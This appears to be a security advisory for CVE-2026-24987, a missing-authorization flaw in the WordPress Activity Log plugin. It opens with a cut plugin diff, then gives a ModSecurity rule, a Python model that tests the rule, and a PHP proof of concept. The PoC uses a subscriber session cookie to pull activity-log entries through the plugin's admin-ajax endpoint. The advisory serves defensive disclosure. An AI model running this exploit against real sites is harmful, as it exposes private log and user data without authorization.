-                "sInfo": "<?php esc_js( __('Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log')); ?>",
-                "sEmptyTable": "<?php esc_js(__('No data available in table', 'winter-activity-log')); ?>",
+                'sSearch': "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                "sLengthMenu": "<?php
+esc_js( __( 'Show _MENU_ entries', 'winter-activity-log' ) );
+?>",
+                "sInfoEmpty": "<?php
+esc_js( __( 'Showing 0 to 0 of 0 entries', 'winter-activity-log' ) );
+?>",
+                "sInfo": "<?php
+esc_js( __( 'Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log' ) );
+?>",
+                "sEmptyTable": "<?php
+esc_js( __( 'No data available in table', 'winter-activity-log' ) );
+?>",
 			},
 			'dom': "<'row'<'col-sm-7 col-md-5'f><'col-sm-5 col-md-6'l>>" + "<'row'<'col-sm-12'tr>>" + "<'row'<'col-sm-5'i><'col-sm-7'p>>"
 		});
@@ -782,19 +1012,35 @@
             closeIcon: true,
             draggable: true,
             backgroundDismiss: true, // this will just close the modal
-            title: '<?php echo esc_html__('Tutorials', 'winter-activity-log');?>',
+            title: '<?php
+echo esc_html__( 'Tutorials', 'winter-activity-log' );
+?>',
             content: '<div class="winterlock_wrap wl_popup_tutorial">' +
-                '<div class="alert alert-warning" role="alert"><a target="_blank" href="https://www.youtube.com/watch?v=VWI1WvlQQa8&list=PL0MjUuUth-hVFykhkW_UN8fsoAYJVbhf2"><i class="fa fa-youtube-play" aria-hidden="true"></i> <?php echo __('How to use quick search filtering?', 'winter-activity-log'); ?></a></div>'+
-                '<div class="alert alert-warning" role="alert"><a target="_blank" href="https://www.youtube.com/watch?v=v8jJcRkEfjI&list=PL0MjUuUth-hVFykhkW_UN8fsoAYJVbhf2"><i class="fa fa-youtube-play" aria-hidden="true"></i> <?php echo __('How to Live Montor with auto refresh and detect login users?', 'win
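Review bot: `title: '<?php echo esc_html__( 'Tutorials', ... ); ?>'` escapes for HTML inside a JS string literal, and the tutorial link labels below it echo `__()` with no escaping at all; inside single-quoted JS strings the correct wrapper is `esc_js()`.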

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-24987
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:100024987,phase:2,deny,status:403,chain,msg:'CVE-2026-24987 - Activity Log plugin missing authorization via AJAX',severity:'CRITICAL',tag:'CVE-2026-24987',tag:'WordPress',tag:'Plugin/Activity-Log'"
  SecRule ARGS_POST:action "@streq winter_activity_log_action" "chain"
    SecRule &ARGS_POST:winterlock_secure "@eq 0" "chain"
      SecRule ARGS_POST:page "@rx ^(wal_(cloudintegration|controlsecurity|disabledlogs|history|logalerts|reports|usersessions)|winteractivitylog)$" "chain"
        SecRule ARGS_POST:function "@rx ^(datatable|filter_(save|get|remove))$"
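To check the rule's match logic offline before deploying it, here is an added example (not from Atomic Edge or the plugin) that models the five chained conditions in Python and runs them over constructed admin-ajax.php requests. The host name, the nonce value and the sample field values are placeholders I made up; the regexes are copied from the rule above.

```python
import re
from urllib.parse import parse_qs, urlencode

# Added example: an offline model of the chained ModSecurity rule above.
# ModSecurity "chain" semantics mean every link must match for the deny to fire.

PAGE_RE = re.compile(
    r"^(wal_(cloudintegration|controlsecurity|disabledlogs|history|logalerts|reports|usersessions)"
    r"|winteractivitylog)$"
)
FUNCTION_RE = re.compile(r"^(datatable|filter_(save|get|remove))$")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into the pieces the rule inspects:
    REQUEST_URI and the ARGS_POST collection (form-encoded body only)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, uri, _version = head.split("\r\n", 1)[0].split(" ", 2)
    args_post = {}
    if method == "POST":
        # parse_qs keeps repeated keys as lists, like a ModSecurity collection
        args_post = parse_qs(body, keep_blank_values=True)
    return {"method": method, "uri": uri, "args_post": args_post}


def rule_100024987(req: dict) -> bool:
    """Return True when the rule chain would deny the request (HTTP 403)."""
    args = req["args_post"]
    # Link 1: REQUEST_URI "@streq /wp-admin/admin-ajax.php"
    if req["uri"] != "/wp-admin/admin-ajax.php":
        return False
    # Link 2: ARGS_POST:action "@streq winter_activity_log_action"
    if not any(v == "winter_activity_log_action" for v in args.get("action", [])):
        return False
    # Link 3: &ARGS_POST:winterlock_secure "@eq 0" (the nonce field is absent)
    if len(args.get("winterlock_secure", [])) != 0:
        return False
    # Link 4: ARGS_POST:page names one of the affected controllers
    if not any(PAGE_RE.match(v) for v in args.get("page", [])):
        return False
    # Link 5: ARGS_POST:function names one of the unprotected methods
    return any(FUNCTION_RE.match(v) for v in args.get("function", []))


def build_post(fields: dict) -> str:
    """Build a constructed form POST to admin-ajax.php (placeholder host)."""
    body = urlencode(fields)
    return (
        "POST /wp-admin/admin-ajax.php HTTP/1.1\r\n"
        "Host: wordpress.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


# Constructed sample traffic; PLACEHOLDER_NONCE is not a real nonce.
SAMPLES = {
    "history_datatable_no_nonce": build_post({
        "action": "winter_activity_log_action", "page": "wal_history", "function": "datatable",
    }),
    "history_datatable_with_nonce": build_post({
        "action": "winter_activity_log_action", "page": "wal_history", "function": "datatable",
        "winterlock_secure": "PLACEHOLDER_NONCE",
    }),
    "activitylog_filter_remove_no_nonce": build_post({
        "action": "winter_activity_log_action", "page": "winteractivitylog", "function": "filter_remove",
    }),
    "unlisted_function": build_post({
        "action": "winter_activity_log_action", "page": "wal_reports", "function": "report_edit",
    }),
    "unrelated_ajax_action": build_post({
        "action": "heartbeat", "page": "wal_history", "function": "datatable",
    }),
}


def evaluate_samples() -> dict:
    """Map each sample name to whether the rule would deny it."""
    return {name: rule_100024987(parse_request(raw)) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, denied in evaluate_samples().items():
        print(f"{name:36s} {'DENY 403' if denied else 'allow'}")
```

The model makes the rule's scope explicit: it keys on the absence of the `winterlock_secure` field, not on the field's validity, so it is virtual patching that buys time rather than a replacement for the server-side capability and nonce checks. Once the plugin is updated, the patched views send the nonce with every request, the third link no longer matches, and the rule can stay deployed without breaking the admin UI.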

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24987 - Activity Log for WordPress <= 1.2.7 - Missing Authorization
/**
 * Proof of Concept for CVE-2026-24987
 * Demonstrates unauthorized access to the plugin's datatable endpoint
 * Requires a valid WordPress subscriber session cookie
 */

$target_url = 'https://vulnerable-site.com';
$cookie = 'wordpress_logged_in_abc=...'; // Valid subscriber session cookie

// Target the wal_history controller datatable function
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$post_data = [
    'action' => 'winter_activity_log_action',
    'page' => 'wal_history',           // Controller name
    'function' => 'datatable',         // Vulnerable method
    // Additional parameters for datatable functionality
    'draw' => '1',
    'start' => '0',
    'length' => '10',
    'search[value]' => '',
    'order[0][column]' => '0',
    'order[0][dir]' => 'asc'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
// Encode the fields as a query string so the body matches the declared
// application/x-www-form-urlencoded Content-Type below (passing the array
// directly would send a multipart/form-data body under the wrong header,
// leaving $_POST empty on the server)
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Cookie: ' . $cookie,
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200 && !empty($response)) {
    $data = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE && isset($data['data'])) {
        echo "SUCCESS: Retrieved " . count($data['data']) . " log entries\n";
        echo "Sample data: " . print_r($data['data'][0] ?? 'No data', true) . "\n";
    } else {
        echo "ERROR: Invalid JSON response or missing data field\n";
        echo "Raw response: " . $response . "\n";
    }
} else {
    echo "ERROR: HTTP $http_code\n";
    echo "Response: " . $response . "\n";
}
?>
